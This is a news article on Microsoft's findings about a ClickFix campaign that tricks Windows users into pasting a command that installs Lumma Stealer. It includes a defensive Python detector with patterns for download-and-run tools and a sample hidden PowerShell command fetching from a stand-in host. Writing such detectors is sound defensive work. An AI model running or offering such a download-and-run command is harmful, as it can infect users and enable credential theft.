Microsoft has recently revealed details about a new cyberattack campaign that is using a social-engineering technique called ClickFix. This campaign is designed to infect Windows computers with a well-known malware called Lumma Stealer. Instead of exploiting a software vulnerability, the attackers trick users into running a malicious command themselves. Once the command is executed in Windows Terminal, the malware begins its activity on the system.


According to Microsoft’s security researchers, the attack mainly depends on human interaction and deception. Victims are usually directed to malicious or compromised websites through phishing emails, fake advertisements, or manipulated search results. When a user opens the webpage, they are shown a message claiming that something is wrong with their browser. The page then instructs them to perform a quick “fix” to solve the problem.

These fake pages often display instructions telling the user to copy a command and run it on their computer. The instructions may ask them to open Windows Terminal or the Run dialog box and paste the command. The message usually claims that running the command will verify the user or fix a technical error. Because the instructions appear simple and official, many users follow them without realizing the risk.


However, the command provided on the webpage is actually malicious. When the victim runs it, the command connects the system to attacker-controlled servers. This allows additional malicious files to be downloaded to the device. The process then installs Lumma Stealer, which starts collecting information from the infected computer.

Microsoft explains that this attack method is dangerous because the user executes the command themselves. Many security tools focus on detecting automatic malware downloads or suspicious system behavior. In this case, the activity may appear normal because the user willingly runs the command. This makes it harder for traditional defenses to detect the attack early.
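From a defender's side, the chain described above (a shell started from the Run dialog or Windows Terminal whose pasted command reaches out to a remote server) is still visible in process-creation telemetry. The following is an added example, not code from Microsoft's report or this article: a small heuristic over Sysmon-style process-creation records. The field names, marker lists, and the two sample records are assumptions constructed for the example.

```python
"""Heuristic detector for ClickFix-style command execution (added example).
Record shape is modelled on Sysmon Event ID 1 fields (ParentImage, Image,
CommandLine); the sample records at the bottom are constructed, not taken
from the campaign. The pattern flagged is the one the article describes:
a user-launched shell, started from the Run dialog (parent explorer.exe)
or Windows Terminal, whose command line fetches remote content or hides
its window."""
import re

# Interactive launchers a victim uses when following the fake "fix".
USER_LAUNCHERS = {"explorer.exe", "windowsterminal.exe", "openconsole.exe"}
# Shells and script hosts a pasted one-liner is typically run through.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Substrings that indicate download-and-run behaviour in the command line.
NETWORK_MARKERS = re.compile(
    r"https?://|invoke-webrequest|\biwr\b|downloadstring|downloadfile|"
    r"\bcurl\b|\biex\b|invoke-expression|\bbitsadmin\b", re.IGNORECASE)
# Switches commonly used to keep the pasted command out of the user's sight.
STEALTH_MARKERS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile|-enc(?:odedcommand)?\b",
    re.IGNORECASE)

def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation record."""
    reasons = []
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event.get("CommandLine", "")
    if image not in SHELLS:          # only shells/script hosts are of interest
        return 0, reasons
    if parent in USER_LAUNCHERS:
        reasons.append(f"shell launched interactively from {parent}")
    if NETWORK_MARKERS.search(cmd):
        reasons.append("command line fetches or evaluates remote content")
    if STEALTH_MARKERS.search(cmd):
        reasons.append("command line hides window or bypasses profile")
    return len(reasons), reasons

def flag_clickfix(events: list[dict], threshold: int = 2) -> list[dict]:
    """Return events scoring at or above threshold, annotated with reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({**ev, "Score": score, "Reasons": reasons})
    return hits

# Constructed sample records: one ClickFix-style launch, one benign admin session.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://malware.example/fix"'},
    {"ParentImage": r"C:\Program Files\WindowsApps\Terminal\WindowsTerminal.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Service -Name Spooler"},
]
```

A single interactive launch is normal admin behaviour, so the threshold requires at least two of the three signals before a record is flagged.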


The malware used in this campaign, Lumma Stealer, is a well-known information-stealing malware. It is often sold through underground cybercrime markets using a malware-as-a-service model. Once it infects a system, the malware quietly collects valuable data from the victim’s device. This data is then sent back to servers controlled by the attackers.

Lumma Stealer can steal many types of sensitive information from infected systems. This includes saved browser passwords, login credentials, session cookies, and cryptocurrency wallet data. It can also collect financial information, system details, and files stored on the device. After gathering the data, the malware sends it to remote servers controlled by cybercriminals.


Security researchers say that ClickFix attacks are becoming more common in recent cyber campaigns. Instead of exploiting software weaknesses, attackers manipulate users into performing the harmful action themselves. By combining social engineering with legitimate tools like Windows Terminal, attackers can make the activity appear normal. This campaign shows how modern cyberattacks increasingly target human behavior rather than just technology.

Stay alert, and keep your security measures updated!

Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news